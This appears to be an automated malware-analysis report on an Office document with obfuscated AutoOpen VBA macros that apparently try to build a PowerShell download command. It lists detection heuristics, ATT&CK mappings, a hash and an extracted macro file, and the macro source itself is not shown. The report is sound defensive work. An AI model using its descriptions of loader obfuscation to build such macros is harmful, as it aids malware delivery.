Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains obfuscated VBA macros with AutoOpen execution, indicative of a downloader. Critical heuristics like 'OLE_VBA_SHELL' and 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' confirm the presence of code designed to execute external commands. The script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload.
Heuristics (8)

- VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13087 bytes |

SHA-256: 4eb2e6ed983f2c4b0397b62293c1ebc780885a1409dc9b3b71a65ff2915d3292

Preview script: first 1,000 lines of the extracted script.